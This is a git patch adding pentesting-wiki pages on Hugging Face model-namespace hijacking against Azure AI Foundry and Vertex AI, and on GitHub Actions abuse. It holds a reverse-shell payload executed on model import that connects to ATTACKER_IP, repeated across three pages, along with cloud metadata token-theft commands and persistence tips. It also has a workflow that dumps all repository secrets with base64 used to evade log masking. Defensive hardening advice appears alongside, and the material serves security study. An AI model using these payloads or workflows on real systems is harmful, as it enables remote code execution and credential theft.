From 5b5e339f96ea5cabed3edb4dfa4103ccdf89e142 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 4 Sep 2025 13:00:46 +0000 Subject: [PATCH 1/4] Add content from: Model Namespace Reuse: An AI Supply-Chain Attack Exploiting ... - Remove searchindex.js (auto-generated file) --- src/SUMMARY.md | 2 + .../az-post-exploitation/README.md | 4 + .../az-azure-ai-foundry-post-exploitation.md | 104 +++++++++++++++ .../gcp-post-exploitation/README.md | 4 + .../gcp-vertex-ai-post-exploitation.md | 123 ++++++++++++++++++ .../pentesting-cloud-methodology.md | 75 +++++++++++ 6 files changed, 312 insertions(+) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1cedf0205..7d93f52b0 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -96,6 +96,7 @@ - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md) - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) @@ -461,6 +462,7 @@ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md) - 
[Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 234962b1c..52b7c1b91 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +az-azure-ai-foundry-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md new file mode 100644 index 000000000..959e01d3b --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md @@ -0,0 +1,104 @@ +# Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment. +- HF model identifiers are Author/ModelName. 
If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path.
+- Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions.
+
+Common HF takeover cases:
+- Ownership deletion: Old path 404 until takeover.
+- Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path.
+
+## Identifying Reusable Namespaces (HF)
+
+```bash
+# Check author/org existence
+curl -I https://huggingface.co/<Author> # 200 exists, 404 deleted/available
+
+# Check model path
+curl -I https://huggingface.co/<Author>/<ModelName>
+# 307 -> redirect (transfer case), 404 -> deleted until takeover
+```
+
+## End-to-end Attack Flow against Azure AI Foundry
+
+1) In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF.
+2) Re-register the abandoned author on HF and recreate the ModelName.
+3) Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True.
+4) Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions.
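The takeover heuristics above lend themselves to automation. A minimal sketch (hypothetical helper; HTTP status codes are passed in directly, so the logic can be exercised without touching huggingface.co):

```python
# Hypothetical helper mirroring the curl heuristics above. Inputs are status
# codes from HEAD requests to https://huggingface.co/<Author> and
# https://huggingface.co/<Author>/<ModelName>.

def classify_namespace(author_status: int, model_status: int) -> str:
    if author_status == 404:
        # Author deleted: anyone can re-register the name and recreate the model
        return "author-reusable"
    if model_status == 307:
        # Transfer case: legacy path still redirects while the old author exists
        return "transferred-monitor-old-author"
    if model_status == 404:
        # Author exists but the model is gone from the legacy path
        return "model-deleted"
    return "active"

print(classify_namespace(404, 404))  # author-reusable
print(classify_namespace(200, 307))  # transferred-monitor-old-author
```

Feeding this from real HEAD responses is a one-liner per URL; the classification itself is what matters for triage at scale.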
+
+Example payload fragment executed on import (for demonstration only):
+
+```python
+# __init__.py or a module imported by the model loader
+import os, socket, subprocess, threading
+
+def _rs(host, port):
+    s = socket.socket(); s.connect((host, port))
+    for fd in (0,1,2):
+        try:
+            os.dup2(s.fileno(), fd)
+        except Exception:
+            pass
+    subprocess.call(["/bin/sh","-i"]) # or powershell on Windows images
+
+if os.environ.get("AZUREML_ENDPOINT","1") == "1":
+    threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
+```
+
+Notes
+- AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True.
+- Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure.
+
+## Post-Exploitation Tips (Azure Endpoint)
+
+- Enumerate environment variables and MSI endpoints for tokens:
+
+```bash
+# Azure Instance Metadata Service (inside Azure compute)
+curl -H "Metadata: true" \
+  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
+```
+
+- Check mounted storage, model artifacts, and reachable Azure services with the acquired token.
+- Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF.
+
+## Defensive Guidance for Azure AI Foundry Users
+
+- Pin models by commit when loading from HF:
+
+```python
+from transformers import AutoModel
+m = AutoModel.from_pretrained("Author/ModelName", revision="<commit_hash>")
+```
+
+- Mirror vetted HF models to a trusted internal registry and deploy from there.
+- Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin.
+- Validate author existence and model provenance prior to deployment.
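To make the pinning guidance enforceable in CI, a pre-deployment check can reject any HF reference that is not pinned to a full commit SHA. A sketch (the reference format and helper name are assumptions, not an existing tool):

```python
import re
from typing import Optional

# Only a full 40-hex commit SHA is immutable; branch and tag names can be
# repointed at attacker content after a namespace takeover.
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")

def is_pinned(model_id: str, revision: Optional[str]) -> bool:
    if revision is None:
        return False  # no revision: resolves to the moving default branch
    if model_id.count("/") != 1:
        return False  # expect exactly Author/ModelName
    return bool(COMMIT_RE.fullmatch(revision))

assert is_pinned("Author/ModelName", "a" * 40)
assert not is_pinned("Author/ModelName", "main")  # branches can move
assert not is_pinned("Author/ModelName", None)
```

Wiring this into a repo linter that scans config files and notebooks for `from_pretrained` calls catches unpinned references before they reach a deployment pipeline.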
+ +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index e24133696..8f4597e1a 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +gcp-vertex-ai-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md new file mode 100644 index 000000000..b43cf5669 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md @@ -0,0 +1,123 @@ +# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models. 
+- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path.
+- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoint’s permissions.
+
+Two common takeover cases on HF:
+- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName.
+- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attacker’s repo serves at the legacy path.
+
+## Identifying Reusable Namespaces (HF)
+
+- Old author deleted: the page for the author returns 404; model path may return 404 until takeover.
+- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attacker’s repo.
+
+Quick checks with curl:
+
+```bash
+# Check author/org existence
+curl -I https://huggingface.co/<Author>
+# 200 = exists, 404 = deleted/available
+
+# Check old model path behavior
+curl -I https://huggingface.co/<Author>/<ModelName>
+# 307 = redirect to new owner (transfer case)
+# 404 = missing (deletion case) until someone re-registers
+```
+
+## End-to-end Attack Flow against Vertex AI
+
+1) Discover reusable model namespaces that Model Garden lists as deployable:
+- Find HF models in Vertex AI Model Garden that still show as “verified deployable”.
+- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed.
+
+2) Re-register the deleted author on HF and recreate the same ModelName.
+
+3) Publish a malicious repo.
Include code that executes on model load. Examples that commonly execute during HF model load: +- Side effects in __init__.py of the repo +- Custom modeling_*.py or processing code referenced by config/auto_map +- Code paths that require trust_remote_code=True in Transformers pipelines + +4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container. + +5) Payload establishes access from the endpoint environment (RCE) with the endpoint’s permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# Place in __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # Or python -c exec ... + +if os.environ.get("VTX_AI","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- Real-world loaders vary. Many Vertex AI HF integrations clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True. +- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP. + +## Post-Exploitation Tips (Vertex AI Endpoint) + +Once code is running inside the endpoint container, consider: +- Enumerating environment variables and metadata for credentials/tokens +- Accessing attached storage or mounted model artifacts +- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.) 
+- Persistence in the model artifact if the platform re-pulls the repo
+
+Enumerate instance metadata if accessible (container dependent):
+
+```bash
+curl -H "Metadata-Flavor: Google" \
+  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+```
+
+## Defensive Guidance for Vertex AI Users
+
+- Pin models by commit in HF loaders to prevent silent replacement:
+
+```python
+from transformers import AutoModel
+m = AutoModel.from_pretrained("Author/ModelName", revision="<commit_hash>")
+```
+
+- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there.
+- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit.
+- In Model Garden, verify model provenance and author existence before deployment.
+
+## Recognition Heuristics (HTTP)
+
+- Deleted author: author page 404; legacy model path 404 until takeover.
+- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content.
+ +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index d3eb7a659..ea387a405 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -420,6 +420,75 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) +## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse) + +A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker. + +Key cases on Hugging Face hub: +- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model. 
+- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content. + +Recognition heuristics (HTTP): + +```bash +# Author existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Legacy model path behavior +curl -I https://huggingface.co// # 307 redirect (transfer) | 404 deleted until takeover +``` + +Exploitation playbook (abstract): +1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs. +2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author. +3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True. +4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoint’s permissions. + +Payload on load (example): + +```python +# __init__.py or a module imported by model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # demo purposes only + +# Gate on an env var if desired +if os.environ.get("INFERENCE_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Cloud platform impact and examples: +- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code. 
+ +{{#ref}} +gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md +{{#endref}} + +- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions. + +{{#ref}} +azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md +{{#endref}} + +Detection and hardening: +- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership. +- Pin to a specific commit in loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Clone vetted models to trusted internal registries/artifact stores and reference those in production. +- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered. + ## Google ### GCP @@ -454,6 +523,12 @@ azure-security/ You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. 
+## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) +- [Transformers docs: Security and remote code](https://huggingface.co/docs/transformers/installation#security-and-remote-code) + {{#include ../banners/hacktricks-training.md}} From b9b20e45671ceda3402ac3fada6d9665cee0a55d Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 9 Sep 2025 01:35:49 +0000 Subject: [PATCH 2/4] Add content from: GitHub Actions: A Cloudy Day for Security - Part 1 - Remove searchindex.js (auto-generated file) --- .../abusing-github-actions/README.md | 31 ++++++ .../gh-actions-context-script-injections.md | 99 +++++++++++++++++++ .../basic-github-information.md | 25 ++++- 3 files changed, 152 insertions(+), 3 deletions(-) diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index dd0f94cc4..c3291afbf 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -173,6 +173,9 @@ In case members of an organization can **create new repos** and you can execute If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). +> [!WARNING] +> Any restriction implemented only inside workflow YAML (for example, `on: push: branches: [main]`, job conditionals, or manual gates) can be edited by collaborators. 
Without external enforcement (branch protections, protected environments, and protected tags), a contributor can retarget a workflow to run on their branch and abuse mounted secrets/permissions. + You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): ```yaml @@ -567,6 +570,30 @@ jobs: key: ${{ secrets.PUBLISH_KEY }} ``` +- Enumerate all secrets via the secrets context (collaborator level). A contributor with write access can modify a workflow on any branch to dump all repository/org/environment secrets. Use double base64 to evade GitHub’s log masking and decode locally: + + ```yaml + name: Steal secrets + on: + push: + branches: [ attacker-branch ] + jobs: + dump: + runs-on: ubuntu-latest + steps: + - name: Double-base64 the secrets context + run: | + echo '${{ toJson(secrets) }}' | base64 -w0 | base64 -w0 + ``` + + Decode locally: + + ```bash + echo "ZXdv...Zz09" | base64 -d | base64 -d + ``` + + Tip: for stealth during testing, encrypt before printing (openssl is preinstalled on GitHub-hosted runners). + ### Abusing Self-hosted runners The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml. @@ -650,6 +677,10 @@ An organization in GitHub is very proactive in reporting accounts to GitHub. All > [!WARNING] > The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. 
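The double-base64 blob printed by a secrets-dumping workflow like the one above can be decoded locally; a small sketch (the sample secrets context is fabricated for illustration):

```python
import base64
import json

def decode_secrets_blob(blob: str) -> dict:
    """Reverse the double base64 applied to the JSON secrets context."""
    return json.loads(base64.b64decode(base64.b64decode(blob)))

# Round-trip with a fabricated secrets context:
sample = {"GITHUB_TOKEN": "ghs_example", "PUBLISH_KEY": "demo"}
blob = base64.b64encode(base64.b64encode(json.dumps(sample).encode())).decode()
assert decode_secrets_blob(blob) == sample
```

The two decode passes mirror the two `base64 -w0` passes in the workflow; the inner payload is whatever `toJson(secrets)` rendered.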
+## References + +- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1) + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md index d9d11a81b..07c773cd7 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -2,4 +2,103 @@ {{#include ../../../banners/hacktricks-training.md}} +## Understanding the risk +GitHub Actions renders expressions ${{ ... }} before the step executes. The rendered value is pasted into the step’s program (for run steps, a shell script). If you interpolate untrusted input directly inside run:, the attacker controls part of the shell program and can execute arbitrary commands. + +Docs: https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions and contexts/functions: https://docs.github.com/en/actions/learn-github-actions/contexts + +Key points: +- Rendering happens before execution. The run script is generated with all expressions resolved, then executed by the shell. +- Many contexts contain user-controlled fields depending on the triggering event (issues, PRs, comments, discussions, forks, stars, etc.). See the untrusted input reference: https://securitylab.github.com/resources/github-actions-untrusted-input/ +- Shell quoting inside run: is not a reliable defense, because the injection occurs at the template rendering stage. Attackers can break out of quotes or inject operators via crafted input. 
+ +## Vulnerable pattern → RCE on runner + +Vulnerable workflow (triggered when someone opens a new issue): + +```yaml +name: New Issue Created +on: + issues: + types: [opened] +jobs: + deploy: + runs-on: ubuntu-latest + permissions: + issues: write + steps: + - name: New issue + run: | + echo "New issue ${{ github.event.issue.title }} created" + - name: Add "new" label to issue + uses: actions-ecosystem/action-add-labels@v1 + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + labels: new +``` + +If an attacker opens an issue titled $(id), the rendered step becomes: + +```sh +echo "New issue $(id) created" +``` + +The command substitution runs id on the runner. Example output: + +``` +New issue uid=1001(runner) gid=118(docker) groups=118(docker),4(adm),100(users),999(systemd-journal) created +``` + +Why quoting doesn’t save you: +- Expressions are rendered first, then the resulting script runs. If the untrusted value contains $(...), `;`, `"`/`'`, or newlines, it can alter the program structure despite your quoting. + +## Safe pattern (shell variables via env) + +Correct mitigation: copy untrusted input into an environment variable, then use native shell expansion ($VAR) in the run script. Do not re-embed with ${{ ... }} inside the command. + +```yaml +# safe +jobs: + deploy: + runs-on: ubuntu-latest + steps: + - name: New issue + env: + TITLE: ${{ github.event.issue.title }} + run: | + echo "New issue $TITLE created" +``` + +Notes: +- Avoid using ${{ env.TITLE }} inside run:. That reintroduces template rendering back into the command and brings the same injection risk. +- Prefer passing untrusted inputs via env: mapping and reference them with $VAR in run:. + +## Reader-triggerable surfaces (treat as untrusted) + +Accounts with only read permission on public repositories can still trigger many events. Any field in contexts derived from these events must be considered attacker-controlled unless proven otherwise. 
Examples: +- issues, issue_comment +- discussion, discussion_comment (orgs can restrict discussions) +- pull_request, pull_request_review, pull_request_review_comment +- pull_request_target (dangerous if misused, runs in base repo context) +- fork (anyone can fork public repos) +- watch (starring a repo) +- Indirectly via workflow_run/workflow_call chains + +Which specific fields are attacker-controlled is event-specific. Consult GitHub Security Lab’s untrusted input guide: https://securitylab.github.com/resources/github-actions-untrusted-input/ + +## Practical tips + +- Minimize use of expressions inside run:. Prefer env: mapping + $VAR. +- If you must transform input, do it in the shell using safe tools (printf %q, jq -r, etc.), still starting from a shell variable. +- Be extra careful when interpolating branch names, PR titles, usernames, labels, discussion titles, and PR head refs into scripts, command-line flags, or file paths. +- For reusable workflows and composite actions, apply the same pattern: map to env then reference $VAR. 
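As a Python analogue of the printf %q tip, shlex.quote shows what safe neutralization looks like when untrusted input must end up on a command line (the attacker-controlled value is fabricated):

```python
import shlex
import subprocess

title = "$(id); rm -rf /tmp/x"  # attacker-controlled example value
# Quote *before* concatenating into the command line:
cmd = "echo New issue " + shlex.quote(title) + " created"
out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
# The payload is printed literally; `id` never runs.
print(out.stdout.strip())
```

The same principle applies in the workflow itself: the untrusted value reaches the shell only as data (an env var or a quoted argument), never as part of the program text.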
+ +## References + +- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1) +- [GitHub workflow syntax](https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions) +- [Contexts and expression syntax](https://docs.github.com/en/actions/learn-github-actions/contexts) +- [Untrusted input reference for GitHub Actions](https://securitylab.github.com/resources/github-actions-untrusted-input/) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md index 94bca00a9..bd4480332 100644 --- a/src/pentesting-ci-cd/github-security/basic-github-information.md +++ b/src/pentesting-ci-cd/github-security/basic-github-information.md @@ -190,8 +190,12 @@ jobs: ``` You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\ -It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. +Additionally, environment protections include: +- **Required reviewers**: gate jobs targeting the environment until approved. Enable **Prevent self-review** to enforce a proper four‑eyes principle on the approval itself. +- **Deployment branches and tags**: restrict which branches/tags may deploy to the environment. Prefer selecting specific branches/tags and ensure those branches are protected. Note: the "Protected branches only" option applies to classic branch protections and may not behave as expected if using rulesets. +- **Wait timer**: delay deployments for a configurable period. 
+It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed. ### Git Action Runner A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. @@ -231,10 +235,11 @@ Different protections can be applied to a branch (like to master): - You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. + - **Require approval of the most recent reviewable push**. Ensures that any new commits after an approval (including pushes by other collaborators) re-trigger review so an attacker cannot push post-approval changes and merge. - **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -- **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). +- **Require status checks to pass before merging.** Some checks need to pass before being able to merge the commit (like a GitHub App reporting SAST results). 
Tip: bind required checks to a specific GitHub App; otherwise any app could spoof the check via the Checks API, and many bots accept skip directives (e.g., "@bot-name skip"). - **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. - **Require signed commits**. The commits need to be signed. - **Require linear history.** Prevent merge commits from being pushed to matching branches. @@ -244,6 +249,16 @@ Different protections can be applied to a branch (like to master): > [!NOTE] > As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +## Tag Protections + +Tags (like latest, stable) are mutable by default. To enforce a four‑eyes flow on tag updates, protect tags and chain protections through environments and branches: + +1) On the tag protection rule, enable **Require deployments to succeed** and require a successful deployment to a protected environment (e.g., prod). +2) In the target environment, restrict **Deployment branches and tags** to the release branch (e.g., main) and optionally configure **Required reviewers** with **Prevent self-review**. +3) On the release branch, configure branch protections to **Require a pull request**, set approvals ≥ 1, and enable both **Dismiss approvals when new commits are pushed** and **Require approval of the most recent reviewable push**. + +This chain prevents a single collaborator from retagging or force-publishing releases by editing workflow YAML, since deployment gates are enforced outside of workflows. 
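The branch-protection half of this chain can also be driven through the REST API (PUT /repos/{owner}/{repo}/branches/{branch}/protection). A sketch of the request body only, with owner/repo as placeholders; actually sending it requires an authenticated client with admin rights on the repo:

```python
import json

# Field names follow the GitHub REST branch-protection endpoint; treat the
# exact schema as something to verify against the current API docs.
protection = {
    "required_status_checks": None,
    "enforce_admins": True,
    "restrictions": None,
    "required_pull_request_reviews": {
        "required_approving_review_count": 1,
        "dismiss_stale_reviews": True,       # Dismiss approvals when new commits are pushed
        "require_last_push_approval": True,  # Require approval of the most recent reviewable push
    },
}

# Body for: PUT /repos/<owner>/<repo>/branches/main/protection
print(json.dumps(protection, indent=2))
```

Managing these settings as code makes drift visible in review, which matters here precisely because the protections must live outside editable workflow YAML.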
+
 ## References
 
